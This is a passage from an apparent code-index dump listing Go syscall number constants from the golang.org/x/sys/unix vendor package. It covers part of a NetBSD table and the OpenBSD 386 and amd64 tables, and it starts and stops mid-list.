SYS_LCHOWN = 275 constant SYS_MSYNC (line 137) | SYS_MSYNC = 277 constant SYS___POSIX_CHOWN (line 138) | SYS___POSIX_CHOWN = 283 constant SYS___POSIX_FCHOWN (line 139) | SYS___POSIX_FCHOWN = 284 constant SYS___POSIX_LCHOWN (line 140) | SYS___POSIX_LCHOWN = 285 constant SYS_GETSID (line 141) | SYS_GETSID = 286 constant SYS___CLONE (line 142) | SYS___CLONE = 287 constant SYS_FKTRACE (line 143) | SYS_FKTRACE = 288 constant SYS_PREADV (line 144) | SYS_PREADV = 289 constant SYS_PWRITEV (line 145) | SYS_PWRITEV = 290 constant SYS___GETCWD (line 146) | SYS___GETCWD = 296 constant SYS_FCHROOT (line 147) | SYS_FCHROOT = 297 constant SYS_LCHFLAGS (line 148) | SYS_LCHFLAGS = 304 constant SYS_ISSETUGID (line 149) | SYS_ISSETUGID = 305 constant SYS_UTRACE (line 150) | SYS_UTRACE = 306 constant SYS_GETCONTEXT (line 151) | SYS_GETCONTEXT = 307 constant SYS_SETCONTEXT (line 152) | SYS_SETCONTEXT = 308 constant SYS__LWP_CREATE (line 153) | SYS__LWP_CREATE = 309 constant SYS__LWP_EXIT (line 154) | SYS__LWP_EXIT = 310 constant SYS__LWP_SELF (line 155) | SYS__LWP_SELF = 311 constant SYS__LWP_WAIT (line 156) | SYS__LWP_WAIT = 312 constant SYS__LWP_SUSPEND (line 157) | SYS__LWP_SUSPEND = 313 constant SYS__LWP_CONTINUE (line 158) | SYS__LWP_CONTINUE = 314 constant SYS__LWP_WAKEUP (line 159) | SYS__LWP_WAKEUP = 315 constant SYS__LWP_GETPRIVATE (line 160) | SYS__LWP_GETPRIVATE = 316 constant SYS__LWP_SETPRIVATE (line 161) | SYS__LWP_SETPRIVATE = 317 constant SYS__LWP_KILL (line 162) | SYS__LWP_KILL = 318 constant SYS__LWP_DETACH (line 163) | SYS__LWP_DETACH = 319 constant SYS__LWP_UNPARK (line 164) | SYS__LWP_UNPARK = 321 constant SYS__LWP_UNPARK_ALL (line 165) | SYS__LWP_UNPARK_ALL = 322 constant SYS__LWP_SETNAME (line 166) | SYS__LWP_SETNAME = 323 constant SYS__LWP_GETNAME (line 167) | SYS__LWP_GETNAME = 324 constant SYS__LWP_CTL (line 168) | SYS__LWP_CTL = 325 constant SYS___SIGACTION_SIGTRAMP (line 169) | SYS___SIGACTION_SIGTRAMP = 340 constant SYS_PMC_GET_INFO (line 170) | SYS_PMC_GET_INFO = 341 constant SYS_PMC_CONTROL (line 171) | SYS_PMC_CONTROL = 342 constant SYS_RASCTL (line 172) | SYS_RASCTL = 343 constant SYS_KQUEUE (line 173) | SYS_KQUEUE = 344 constant SYS__SCHED_SETPARAM (line 174) | SYS__SCHED_SETPARAM = 346 constant SYS__SCHED_GETPARAM (line 175) | SYS__SCHED_GETPARAM = 347 constant SYS__SCHED_SETAFFINITY (line 176) | SYS__SCHED_SETAFFINITY = 348 constant SYS__SCHED_GETAFFINITY (line 177) | SYS__SCHED_GETAFFINITY = 349 constant SYS_SCHED_YIELD (line 178) | SYS_SCHED_YIELD = 350 constant SYS_FSYNC_RANGE (line 179) | SYS_FSYNC_RANGE = 354 constant SYS_UUIDGEN (line 180) | SYS_UUIDGEN = 355 constant SYS_GETVFSSTAT (line 181) | SYS_GETVFSSTAT = 356 constant SYS_STATVFS1 (line 182) | SYS_STATVFS1 = 357 constant SYS_FSTATVFS1 (line 183) | SYS_FSTATVFS1 = 358 constant SYS_EXTATTRCTL (line 184) | SYS_EXTATTRCTL = 360 constant SYS_EXTATTR_SET_FILE (line 185) | SYS_EXTATTR_SET_FILE = 361 constant SYS_EXTATTR_GET_FILE (line 186) | SYS_EXTATTR_GET_FILE = 362 constant SYS_EXTATTR_DELETE_FILE (line 187) | SYS_EXTATTR_DELETE_FILE = 363 constant SYS_EXTATTR_SET_FD (line 188) | SYS_EXTATTR_SET_FD = 364 constant SYS_EXTATTR_GET_FD (line 189) | SYS_EXTATTR_GET_FD = 365 constant SYS_EXTATTR_DELETE_FD (line 190) | SYS_EXTATTR_DELETE_FD = 366 constant SYS_EXTATTR_SET_LINK (line 191) | SYS_EXTATTR_SET_LINK = 367 constant SYS_EXTATTR_GET_LINK (line 192) | SYS_EXTATTR_GET_LINK = 368 constant SYS_EXTATTR_DELETE_LINK (line 193) | SYS_EXTATTR_DELETE_LINK = 369 constant SYS_EXTATTR_LIST_FD (line 194) | SYS_EXTATTR_LIST_FD = 370 constant SYS_EXTATTR_LIST_FILE (line 195) | SYS_EXTATTR_LIST_FILE = 371 constant SYS_EXTATTR_LIST_LINK (line 196) | SYS_EXTATTR_LIST_LINK = 372 constant SYS_SETXATTR (line 197) | SYS_SETXATTR = 375 constant SYS_LSETXATTR (line 198) | SYS_LSETXATTR = 376 constant SYS_FSETXATTR (line 199) | SYS_FSETXATTR = 377 constant SYS_GETXATTR (line 200) | SYS_GETXATTR = 378 constant SYS_LGETXATTR (line 201) | SYS_LGETXATTR = 379 constant SYS_FGETXATTR (line 202) | SYS_FGETXATTR = 380 constant SYS_LISTXATTR (line 203) | SYS_LISTXATTR = 381 constant SYS_LLISTXATTR (line 204) | SYS_LLISTXATTR = 382 constant SYS_FLISTXATTR (line 205) | SYS_FLISTXATTR = 383 constant SYS_REMOVEXATTR (line 206) | SYS_REMOVEXATTR = 384 constant SYS_LREMOVEXATTR (line 207) | SYS_LREMOVEXATTR = 385 constant SYS_FREMOVEXATTR (line 208) | SYS_FREMOVEXATTR = 386 constant SYS_GETDENTS (line 209) | SYS_GETDENTS = 390 constant SYS_SOCKET (line 210) | SYS_SOCKET = 394 constant SYS_GETFH (line 211) | SYS_GETFH = 395 constant SYS_MOUNT (line 212) | SYS_MOUNT = 410 constant SYS_MREMAP (line 213) | SYS_MREMAP = 411 constant SYS_PSET_CREATE (line 214) | SYS_PSET_CREATE = 412 constant SYS_PSET_DESTROY (line 215) | SYS_PSET_DESTROY = 413 constant SYS_PSET_ASSIGN (line 216) | SYS_PSET_ASSIGN = 414 constant SYS__PSET_BIND (line 217) | SYS__PSET_BIND = 415 constant SYS_POSIX_FADVISE (line 218) | SYS_POSIX_FADVISE = 416 constant SYS_SELECT (line 219) | SYS_SELECT = 417 constant SYS_GETTIMEOFDAY (line 220) | SYS_GETTIMEOFDAY = 418 constant SYS_SETTIMEOFDAY (line 221) | SYS_SETTIMEOFDAY = 419 constant SYS_UTIMES (line 222) | SYS_UTIMES = 420 constant SYS_ADJTIME (line 223) | SYS_ADJTIME = 421 constant SYS_FUTIMES (line 224) | SYS_FUTIMES = 423 constant SYS_LUTIMES (line 225) | SYS_LUTIMES = 424 constant SYS_SETITIMER (line 226) | SYS_SETITIMER = 425 constant SYS_GETITIMER (line 227) | SYS_GETITIMER = 426 constant SYS_CLOCK_GETTIME (line 228) | SYS_CLOCK_GETTIME = 427 constant SYS_CLOCK_SETTIME (line 229) | SYS_CLOCK_SETTIME = 428 constant SYS_CLOCK_GETRES (line 230) | SYS_CLOCK_GETRES = 429 constant SYS_NANOSLEEP (line 231) | SYS_NANOSLEEP = 430 constant SYS___SIGTIMEDWAIT (line 232) | SYS___SIGTIMEDWAIT = 431 constant SYS__LWP_PARK (line 233) | SYS__LWP_PARK = 434 constant SYS_KEVENT (line 234) | SYS_KEVENT = 435 constant SYS_PSELECT (line 235) | SYS_PSELECT = 436 constant SYS_POLLTS (line 236) | SYS_POLLTS = 437 constant SYS_STAT (line 237) | SYS_STAT = 439 constant SYS_FSTAT (line 238) | SYS_FSTAT = 440 constant SYS_LSTAT (line 239) | SYS_LSTAT = 441 constant SYS___SEMCTL (line 240) | SYS___SEMCTL = 442 constant SYS_SHMCTL (line 241) | SYS_SHMCTL = 443 constant SYS_MSGCTL (line 242) | SYS_MSGCTL = 444 constant SYS_GETRUSAGE (line 243) | SYS_GETRUSAGE = 445 constant SYS_TIMER_SETTIME (line 244) | SYS_TIMER_SETTIME = 446 constant SYS_TIMER_GETTIME (line 245) | SYS_TIMER_GETTIME = 447 constant SYS_NTP_GETTIME (line 246) | SYS_NTP_GETTIME = 448 constant SYS_WAIT4 (line 247) | SYS_WAIT4 = 449 constant SYS_MKNOD (line 248) | SYS_MKNOD = 450 constant SYS_FHSTAT (line 249) | SYS_FHSTAT = 451 constant SYS_PIPE2 (line 250) | SYS_PIPE2 = 453 constant SYS_DUP3 (line 251) | SYS_DUP3 = 454 constant SYS_KQUEUE1 (line 252) | SYS_KQUEUE1 = 455 constant SYS_PACCEPT (line 253) | SYS_PACCEPT = 456 constant SYS_LINKAT (line 254) | SYS_LINKAT = 457 constant SYS_RENAMEAT (line 255) | SYS_RENAMEAT = 458 constant SYS_MKFIFOAT (line 256) | SYS_MKFIFOAT = 459 constant SYS_MKNODAT (line 257) | SYS_MKNODAT = 460 constant SYS_MKDIRAT (line 258) | SYS_MKDIRAT = 461 constant SYS_FACCESSAT (line 259) | SYS_FACCESSAT = 462 constant SYS_FCHMODAT (line 260) | SYS_FCHMODAT = 463 constant SYS_FCHOWNAT (line 261) | SYS_FCHOWNAT = 464 constant SYS_FEXECVE (line 262) | SYS_FEXECVE = 465 constant SYS_FSTATAT (line 263) | SYS_FSTATAT = 466 constant SYS_UTIMENSAT (line 264) | SYS_UTIMENSAT = 467 constant SYS_OPENAT (line 265) | SYS_OPENAT = 468 constant SYS_READLINKAT (line 266) | SYS_READLINKAT = 469 constant SYS_SYMLINKAT (line 267) | SYS_SYMLINKAT = 470 constant SYS_UNLINKAT (line 268) | SYS_UNLINKAT = 471 constant SYS_FUTIMENS (line 269) | SYS_FUTIMENS = 472 constant SYS___QUOTACTL (line 270) | SYS___QUOTACTL = 473 constant SYS_POSIX_SPAWN (line 271) | SYS_POSIX_SPAWN = 474 constant SYS_RECVMMSG (line 272) | SYS_RECVMMSG = 475 constant SYS_SENDMMSG (line 273) | SYS_SENDMMSG = 476 FILE: vendor/golang.org/x/sys/unix/zsysnum_openbsd_386.go constant SYS_EXIT (line 10) | SYS_EXIT = 1 constant SYS_FORK (line 11) | SYS_FORK = 2 constant SYS_READ (line 12) | SYS_READ = 3 constant SYS_WRITE (line 13) | SYS_WRITE = 4 constant SYS_OPEN (line 14) | SYS_OPEN = 5 constant SYS_CLOSE (line 15) | SYS_CLOSE = 6 constant SYS_GETENTROPY (line 16) | SYS_GETENTROPY = 7 constant SYS___TFORK (line 17) | SYS___TFORK = 8 constant SYS_LINK (line 18) | SYS_LINK = 9 constant SYS_UNLINK (line 19) | SYS_UNLINK = 10 constant SYS_WAIT4 (line 20) | SYS_WAIT4 = 11 constant SYS_CHDIR (line 21) | SYS_CHDIR = 12 constant SYS_FCHDIR (line 22) | SYS_FCHDIR = 13 constant SYS_MKNOD (line 23) | SYS_MKNOD = 14 constant SYS_CHMOD (line 24) | SYS_CHMOD = 15 constant SYS_CHOWN (line 25) | SYS_CHOWN = 16 constant SYS_OBREAK (line 26) | SYS_OBREAK = 17 constant SYS_GETDTABLECOUNT (line 27) | SYS_GETDTABLECOUNT = 18 constant SYS_GETRUSAGE (line 28) | SYS_GETRUSAGE = 19 constant SYS_GETPID (line 29) | SYS_GETPID = 20 constant SYS_MOUNT (line 30) | SYS_MOUNT = 21 constant SYS_UNMOUNT (line 31) | SYS_UNMOUNT = 22 constant SYS_SETUID (line 32) | SYS_SETUID = 23 constant SYS_GETUID (line 33) | SYS_GETUID = 24 constant SYS_GETEUID (line 34) | SYS_GETEUID = 25 constant SYS_PTRACE (line 35) | SYS_PTRACE = 26 constant SYS_RECVMSG (line 36) | SYS_RECVMSG = 27 constant SYS_SENDMSG (line 37) | SYS_SENDMSG = 28 constant SYS_RECVFROM (line 38) | SYS_RECVFROM = 29 constant SYS_ACCEPT (line 39) | SYS_ACCEPT = 30 constant SYS_GETPEERNAME (line 40) | SYS_GETPEERNAME = 31 constant SYS_GETSOCKNAME (line 41) | SYS_GETSOCKNAME = 32 constant SYS_ACCESS (line 42) | SYS_ACCESS = 33 constant SYS_CHFLAGS (line 43) | SYS_CHFLAGS = 34 constant SYS_FCHFLAGS (line 44) | SYS_FCHFLAGS = 35 constant SYS_SYNC (line 45) | SYS_SYNC = 36 constant SYS_STAT (line 46) | SYS_STAT = 38 constant SYS_GETPPID (line 47) | SYS_GETPPID = 39 constant SYS_LSTAT (line 48) | SYS_LSTAT = 40 constant SYS_DUP (line 49) | SYS_DUP = 41 constant SYS_FSTATAT (line 50) | SYS_FSTATAT = 42 constant SYS_GETEGID (line 51) | SYS_GETEGID = 43 constant SYS_PROFIL (line 52) | SYS_PROFIL = 44 constant SYS_KTRACE (line 53) | SYS_KTRACE = 45 constant SYS_SIGACTION (line 54) | SYS_SIGACTION = 46 constant SYS_GETGID (line 55) | SYS_GETGID = 47 constant SYS_SIGPROCMASK (line 56) | SYS_SIGPROCMASK = 48 constant SYS_SETLOGIN (line 57) | SYS_SETLOGIN = 50 constant SYS_ACCT (line 58) | SYS_ACCT = 51 constant SYS_SIGPENDING (line 59) | SYS_SIGPENDING = 52 constant SYS_FSTAT (line 60) | SYS_FSTAT = 53 constant SYS_IOCTL (line 61) | SYS_IOCTL = 54 constant SYS_REBOOT (line 62) | SYS_REBOOT = 55 constant SYS_REVOKE (line 63) | SYS_REVOKE = 56 constant SYS_SYMLINK (line 64) | SYS_SYMLINK = 57 constant SYS_READLINK (line 65) | SYS_READLINK = 58 constant SYS_EXECVE (line 66) | SYS_EXECVE = 59 constant SYS_UMASK (line 67) | SYS_UMASK = 60 constant SYS_CHROOT (line 68) | SYS_CHROOT = 61 constant SYS_GETFSSTAT (line 69) | SYS_GETFSSTAT = 62 constant SYS_STATFS (line 70) | SYS_STATFS = 63 constant SYS_FSTATFS (line 71) | SYS_FSTATFS = 64 constant SYS_FHSTATFS (line 72) | SYS_FHSTATFS = 65 constant SYS_VFORK (line 73) | SYS_VFORK = 66 constant SYS_GETTIMEOFDAY (line 74) | SYS_GETTIMEOFDAY = 67 constant SYS_SETTIMEOFDAY (line 75) | SYS_SETTIMEOFDAY = 68 constant SYS_SETITIMER (line 76) | SYS_SETITIMER = 69 constant SYS_GETITIMER (line 77) | SYS_GETITIMER = 70 constant SYS_SELECT (line 78) | SYS_SELECT = 71 constant SYS_KEVENT (line 79) | SYS_KEVENT = 72 constant SYS_MUNMAP (line 80) | SYS_MUNMAP = 73 constant SYS_MPROTECT (line 81) | SYS_MPROTECT = 74 constant SYS_MADVISE (line 82) | SYS_MADVISE = 75 constant SYS_UTIMES (line 83) | SYS_UTIMES = 76 constant SYS_FUTIMES (line 84) | SYS_FUTIMES = 77 constant SYS_MINCORE (line 85) | SYS_MINCORE = 78 constant SYS_GETGROUPS (line 86) | SYS_GETGROUPS = 79 constant SYS_SETGROUPS (line 87) | SYS_SETGROUPS = 80 constant SYS_GETPGRP (line 88) | SYS_GETPGRP = 81 constant SYS_SETPGID (line 89) | SYS_SETPGID = 82 constant SYS_FUTEX (line 90) | SYS_FUTEX = 83 constant SYS_UTIMENSAT (line 91) | SYS_UTIMENSAT = 84 constant SYS_FUTIMENS (line 92) | SYS_FUTIMENS = 85 constant SYS_KBIND (line 93) | SYS_KBIND = 86 constant SYS_CLOCK_GETTIME (line 94) | SYS_CLOCK_GETTIME = 87 constant SYS_CLOCK_SETTIME (line 95) | SYS_CLOCK_SETTIME = 88 constant SYS_CLOCK_GETRES (line 96) | SYS_CLOCK_GETRES = 89 constant SYS_DUP2 (line 97) | SYS_DUP2 = 90 constant SYS_NANOSLEEP (line 98) | SYS_NANOSLEEP = 91 constant SYS_FCNTL (line 99) | SYS_FCNTL = 92 constant SYS_ACCEPT4 (line 100) | SYS_ACCEPT4 = 93 constant SYS___THRSLEEP (line 101) | SYS___THRSLEEP = 94 constant SYS_FSYNC (line 102) | SYS_FSYNC = 95 constant SYS_SETPRIORITY (line 103) | SYS_SETPRIORITY = 96 constant SYS_SOCKET (line 104) | SYS_SOCKET = 97 constant SYS_CONNECT (line 105) | SYS_CONNECT = 98 constant SYS_GETDENTS (line 106) | SYS_GETDENTS = 99 constant SYS_GETPRIORITY (line 107) | SYS_GETPRIORITY = 100 constant SYS_PIPE2 (line 108) | SYS_PIPE2 = 101 constant SYS_DUP3 (line 109) | SYS_DUP3 = 102 constant SYS_SIGRETURN (line 110) | SYS_SIGRETURN = 103 constant SYS_BIND (line 111) | SYS_BIND = 104 constant SYS_SETSOCKOPT (line 112) | SYS_SETSOCKOPT = 105 constant SYS_LISTEN (line 113) | SYS_LISTEN = 106 constant SYS_CHFLAGSAT (line 114) | SYS_CHFLAGSAT = 107 constant SYS_PLEDGE (line 115) | SYS_PLEDGE = 108 constant SYS_PPOLL (line 116) | SYS_PPOLL = 109 constant SYS_PSELECT (line 117) | SYS_PSELECT = 110 constant SYS_SIGSUSPEND (line 118) | SYS_SIGSUSPEND = 111 constant SYS_SENDSYSLOG (line 119) | SYS_SENDSYSLOG = 112 constant SYS_UNVEIL (line 120) | SYS_UNVEIL = 114 constant SYS_GETSOCKOPT (line 121) | SYS_GETSOCKOPT = 118 constant SYS_THRKILL (line 122) | SYS_THRKILL = 119 constant SYS_READV (line 123) | SYS_READV = 120 constant SYS_WRITEV (line 124) | SYS_WRITEV = 121 constant SYS_KILL (line 125) | SYS_KILL = 122 constant SYS_FCHOWN (line 126) | SYS_FCHOWN = 123 constant SYS_FCHMOD (line 127) | SYS_FCHMOD = 124 constant SYS_SETREUID (line 128) | SYS_SETREUID = 126 constant SYS_SETREGID (line 129) | SYS_SETREGID = 127 constant SYS_RENAME (line 130) | SYS_RENAME = 128 constant SYS_FLOCK (line 131) | SYS_FLOCK = 131 constant SYS_MKFIFO (line 132) | SYS_MKFIFO = 132 constant SYS_SENDTO (line 133) | SYS_SENDTO = 133 constant SYS_SHUTDOWN (line 134) | SYS_SHUTDOWN = 134 constant SYS_SOCKETPAIR (line 135) | SYS_SOCKETPAIR = 135 constant SYS_MKDIR (line 136) | SYS_MKDIR = 136 constant SYS_RMDIR (line 137) | SYS_RMDIR = 137 constant SYS_ADJTIME (line 138) | SYS_ADJTIME = 140 constant SYS_GETLOGIN_R (line 139) | SYS_GETLOGIN_R = 141 constant SYS_SETSID (line 140) | SYS_SETSID = 147 constant SYS_QUOTACTL (line 141) | SYS_QUOTACTL = 148 constant SYS_NFSSVC (line 142) | SYS_NFSSVC = 155 constant SYS_GETFH (line 143) | SYS_GETFH = 161 constant SYS_SYSARCH (line 144) | SYS_SYSARCH = 165 constant SYS_PREAD (line 145) | SYS_PREAD = 173 constant SYS_PWRITE (line 146) | SYS_PWRITE = 174 constant SYS_SETGID (line 147) | SYS_SETGID = 181 constant SYS_SETEGID (line 148) | SYS_SETEGID = 182 constant SYS_SETEUID (line 149) | SYS_SETEUID = 183 constant SYS_PATHCONF (line 150) | SYS_PATHCONF = 191 constant SYS_FPATHCONF (line 151) | SYS_FPATHCONF = 192 constant SYS_SWAPCTL (line 152) | SYS_SWAPCTL = 193 constant SYS_GETRLIMIT (line 153) | SYS_GETRLIMIT = 194 constant SYS_SETRLIMIT (line 154) | SYS_SETRLIMIT = 195 constant SYS_MMAP (line 155) | SYS_MMAP = 197 constant SYS_LSEEK (line 156) | SYS_LSEEK = 199 constant SYS_TRUNCATE (line 157) | SYS_TRUNCATE = 200 constant SYS_FTRUNCATE (line 158) | SYS_FTRUNCATE = 201 constant SYS_SYSCTL (line 159) | SYS_SYSCTL = 202 constant SYS_MLOCK (line 160) | SYS_MLOCK = 203 constant SYS_MUNLOCK (line 161) | SYS_MUNLOCK = 204 constant SYS_GETPGID (line 162) | SYS_GETPGID = 207 constant SYS_UTRACE (line 163) | SYS_UTRACE = 209 constant SYS_SEMGET (line 164) | SYS_SEMGET = 221 constant SYS_MSGGET (line 165) | SYS_MSGGET = 225 constant SYS_MSGSND (line 166) | SYS_MSGSND = 226 constant SYS_MSGRCV (line 167) | SYS_MSGRCV = 227 constant SYS_SHMAT (line 168) | SYS_SHMAT = 228 constant SYS_SHMDT (line 169) | SYS_SHMDT = 230 constant SYS_MINHERIT (line 170) | SYS_MINHERIT = 250 constant SYS_POLL (line 171) | SYS_POLL = 252 constant SYS_ISSETUGID (line 172) | SYS_ISSETUGID = 253 constant SYS_LCHOWN (line 173) | SYS_LCHOWN = 254 constant SYS_GETSID (line 174) | SYS_GETSID = 255 constant SYS_MSYNC (line 175) | SYS_MSYNC = 256 constant SYS_PIPE (line 176) | SYS_PIPE = 263 constant SYS_FHOPEN (line 177) | SYS_FHOPEN = 264 constant SYS_PREADV (line 178) | SYS_PREADV = 267 constant SYS_PWRITEV (line 179) | SYS_PWRITEV = 268 constant SYS_KQUEUE (line 180) | SYS_KQUEUE = 269 constant SYS_MLOCKALL (line 181) | SYS_MLOCKALL = 271 constant SYS_MUNLOCKALL (line 182) | SYS_MUNLOCKALL = 272 constant SYS_GETRESUID (line 183) | SYS_GETRESUID = 281 constant SYS_SETRESUID (line 184) | SYS_SETRESUID = 282 constant SYS_GETRESGID (line 185) | SYS_GETRESGID = 283 constant SYS_SETRESGID (line 186) | SYS_SETRESGID = 284 constant SYS_MQUERY (line 187) | SYS_MQUERY = 286 constant SYS_CLOSEFROM (line 188) | SYS_CLOSEFROM = 287 constant SYS_SIGALTSTACK (line 189) | SYS_SIGALTSTACK = 288 constant SYS_SHMGET (line 190) | SYS_SHMGET = 289 constant SYS_SEMOP (line 191) | SYS_SEMOP = 290 constant SYS_FHSTAT (line 192) | SYS_FHSTAT = 294 constant SYS___SEMCTL (line 193) | SYS___SEMCTL = 295 constant SYS_SHMCTL (line 194) | SYS_SHMCTL = 296 constant SYS_MSGCTL (line 195) | SYS_MSGCTL = 297 constant SYS_SCHED_YIELD (line 196) | SYS_SCHED_YIELD = 298 constant SYS_GETTHRID (line 197) | SYS_GETTHRID = 299 constant SYS___THRWAKEUP (line 198) | SYS___THRWAKEUP = 301 constant SYS___THREXIT (line 199) | SYS___THREXIT = 302 constant SYS___THRSIGDIVERT (line 200) | SYS___THRSIGDIVERT = 303 constant SYS___GETCWD (line 201) | SYS___GETCWD = 304 constant SYS_ADJFREQ (line 202) | SYS_ADJFREQ = 305 constant SYS_SETRTABLE (line 203) | SYS_SETRTABLE = 310 constant SYS_GETRTABLE (line 204) | SYS_GETRTABLE = 311 constant SYS_FACCESSAT (line 205) | SYS_FACCESSAT = 313 constant SYS_FCHMODAT (line 206) | SYS_FCHMODAT = 314 constant SYS_FCHOWNAT (line 207) | SYS_FCHOWNAT = 315 constant SYS_LINKAT (line 208) | SYS_LINKAT = 317 constant SYS_MKDIRAT (line 209) | SYS_MKDIRAT = 318 constant SYS_MKFIFOAT (line 210) | SYS_MKFIFOAT = 319 constant SYS_MKNODAT (line 211) | SYS_MKNODAT = 320 constant SYS_OPENAT (line 212) | SYS_OPENAT = 321 constant SYS_READLINKAT (line 213) | SYS_READLINKAT = 322 constant SYS_RENAMEAT (line 214) | SYS_RENAMEAT = 323 constant SYS_SYMLINKAT (line 215) | SYS_SYMLINKAT = 324 constant SYS_UNLINKAT (line 216) | SYS_UNLINKAT = 325 constant SYS___SET_TCB (line 217) | SYS___SET_TCB = 329 constant SYS___GET_TCB (line 218) | SYS___GET_TCB = 330 FILE: vendor/golang.org/x/sys/unix/zsysnum_openbsd_amd64.go constant SYS_EXIT (line 10) | SYS_EXIT = 1 constant SYS_FORK (line 11) | SYS_FORK = 2 constant SYS_READ (line 12) | SYS_READ = 3 constant SYS_WRITE (line 13) | SYS_WRITE = 4 constant SYS_OPEN (line 14) | SYS_OPEN = 5 constant SYS_CLOSE (line 15) | SYS_CLOSE = 6 constant SYS_GETENTROPY (line 16) | SYS_GETENTROPY = 7 constant SYS___TFORK (line 17) | SYS___TFORK = 8 constant SYS_LINK (line 18) | SYS_LINK = 9 constant SYS_UNLINK (line 19) | SYS_UNLINK = 10 constant SYS_WAIT4 (line 20) | SYS_WAIT4 = 11 constant SYS_CHDIR (line 21) | SYS_CHDIR = 12 constant SYS_FCHDIR (line 22) | SYS_FCHDIR = 13 constant SYS_MKNOD (line 23) | SYS_MKNOD = 14 constant SYS_CHMOD (line 24) | SYS_CHMOD = 15 constant SYS_CHOWN (line 25) | SYS_CHOWN = 16 constant SYS_OBREAK (line 26) | SYS_OBREAK = 17 constant SYS_GETDTABLECOUNT (line 27) | SYS_GETDTABLECOUNT = 18 constant SYS_GETRUSAGE (line 28) | SYS_GETRUSAGE = 19 constant SYS_GETPID (line 29) | SYS_GETPID = 20 constant SYS_MOUNT (line 30) | SYS_MOUNT = 21 constant SYS_UNMOUNT (line 31) | SYS_UNMOUNT = 22 constant SYS_SETUID (line 32) | SYS_SETUID = 23 constant SYS_GETUID (line 33) | SYS_GETUID = 24 constant SYS_GETEUID (line 34) | SYS_GETEUID = 25 constant SYS_PTRACE (line 35) | SYS_PTRACE = 26 constant SYS_RECVMSG (line 36) | SYS_RECVMSG = 27 constant SYS_SENDMSG (line 37) | SYS_SENDMSG = 28 constant SYS_RECVFROM (line 38) | SYS_RECVFROM = 29 constant SYS_ACCEPT (line 39) | SYS_ACCEPT = 30 constant SYS_GETPEERNAME (line 40) | SYS_GETPEERNAME = 31 constant SYS_GETSOCKNAME (line 41) | SYS_GETSOCKNAME = 32 constant SYS_ACCESS (line 42) | SYS_ACCESS = 33 constant SYS_CHFLAGS (line 43) | SYS_CHFLAGS = 34 constant SYS_FCHFLAGS (line 44) | SYS_FCHFLAGS = 35 constant SYS_SYNC (line 45) | SYS_SYNC = 36 constant SYS_STAT (line 46) | SYS_STAT = 38 constant SYS_GETPPID (line 47) | SYS_GETPPID = 39 constant SYS_LSTAT (line 48) | SYS_LSTAT = 40 constant SYS_DUP (line 49) | SYS_DUP = 41 constant SYS_FSTATAT (line 50) | SYS_FSTATAT = 42 constant SYS_GETEGID (line 51) | SYS_GETEGID = 43 constant SYS_PROFIL (line 52) | SYS_PROFIL = 44 constant SYS_KTRACE (line 53) | SYS_KTRACE = 45 constant SYS_SIGACTION (line 54) | SYS_SIGACTION = 46 constant SYS_GETGID (line 55) | SYS_GETGID = 47 constant SYS_SIGPROCMASK (line 56) | SYS_SIGPROCMASK = 48 constant SYS_SETLOGIN (line 57) | SYS_SETLOGIN = 50 constant SYS_ACCT (line 58) | SYS_ACCT = 51 constant SYS_SIGPENDING (line 59) | SYS_SIGPENDING = 52 constant SYS_FSTAT (line 60) | SYS_FSTAT = 53 constant SYS_IOCTL (line 61) | SYS_IOCTL = 54 constant SYS_REBOOT (line 62) | SYS_REBOOT = 55 constant SYS_REVOKE (line 63) | SYS_REVOKE = 56 constant SYS_SYMLINK (line 64) | SYS_SYMLINK = 57 constant SYS_READLINK (line 65) | SYS_READLINK = 58 constant SYS_EXECVE (line 66) | SYS_EXECVE = 59 constant SYS_UMASK (line 67) | SYS_UMASK = 60 constant SYS_CHROOT (line 68) | SYS_CHROOT = 61 constant SYS_GETFSSTAT (line 69) | SYS_GETFSSTAT = 62 constant SYS_STATFS (line 70) | SYS_STATFS = 63 constant SYS_FSTATFS (line 71) | SYS_FSTATFS = 64 constant SYS_FHSTATFS (line 72) | SYS_FHSTATFS = 65 constant SYS_VFORK (line 73) | SYS_VFORK = 66 constant SYS_GETTIMEOFDAY (line 74) | SYS_GETTIMEOFDAY = 67 constant SYS_SETTIMEOFDAY (line 75) | SYS_SETTIMEOFDAY = 68 constant SYS_SETITIMER (line 76) | SYS_SETITIMER = 69 constant SYS_GETITIMER (line 77) | SYS_GETITIMER = 70 constant SYS_SELECT (line 78) | SYS_SELECT = 71 constant SYS_KEVENT (line 79) | SYS_KEVENT = 72 constant SYS_MUNMAP (line 80) | SYS_MUNMAP = 73 constant SYS_MPROTECT (line 81) | SYS_MPROTECT = 74 constant SYS_MADVISE (line 82) | SYS_MADVISE = 75 constant SYS_UTIMES (line 83) | SYS_UTIMES = 76 constant SYS_FUTIMES (line 84) | SYS_FUTIMES = 77 constant SYS_MINCORE (line 85) | SYS_MINCORE = 78 constant SYS_GETGROUPS (line 86) | SYS_GETGROUPS = 79 constant SYS_SETGROUPS (line 87) | SYS_SETGROUPS = 80 constant SYS_GETPGRP (line 88) | SYS_GETPGRP = 81 constant SYS_SETPGID (line 89) | SYS_SETPGID = 82 constant SYS_FUTEX (line 90) | SYS_FUTEX = 83 constant SYS_UTIMENSAT (line 91) | SYS_UTIMENSAT = 84 constant SYS_FUTIMENS (line 92) | SYS_FUTIMENS = 85 constant SYS_KBIND (line 93) | SYS_KBIND = 86 constant SYS_CLOCK_GETTIME (line 94) | SYS_CLOCK_GETTIME = 87 constant SYS_CLOCK_SETTIME (line 95) | SYS_CLOCK_SETTIME = 88 constant SYS_CLOCK_GETRES (line 96) | SYS_CLOCK_GETRES = 89 constant SYS_DUP2 (line 97) | SYS_DUP2 = 90 constant SYS_NANOSLEEP (line 98) | SYS_NANOSLEEP = 91 constant SYS_FCNTL (line 99) | SYS_FCNTL = 92 constant SYS_ACCEPT4 (line 100) | SYS_ACCEPT4 = 93 constant SYS___THRSLEEP (line 101) | SYS___THRSLEEP = 94 constant SYS_FSYNC (line 102) | SYS_FSYNC = 95 constant SYS_SETPRIORITY (line 103) | SYS_SETPRIORITY = 96 constant SYS_SOCKET (line 104) | SYS_SOCKET = 97 constant SYS_CONNECT (line 105) | SYS_CONNECT = 98 constant SYS_GETDENTS (line 106) | SYS_GETDENTS = 99 constant SYS_GETPRIORITY (line 107) | SYS_GETPRIORITY = 100 constant SYS_PIPE2 (line 108) | SYS_PIPE2 = 101 constant SYS_DUP3 (line 109) | SYS_DUP3 = 102 constant SYS_SIGRETURN (line 110) | SYS_SIGRETURN = 103 constant SYS_BIND (line 111) | SYS_BIND = 104 constant SYS_SETSOCKOPT (line 112) | SYS_SETSOCKOPT = 105 constant SYS_LISTEN (line 113) | 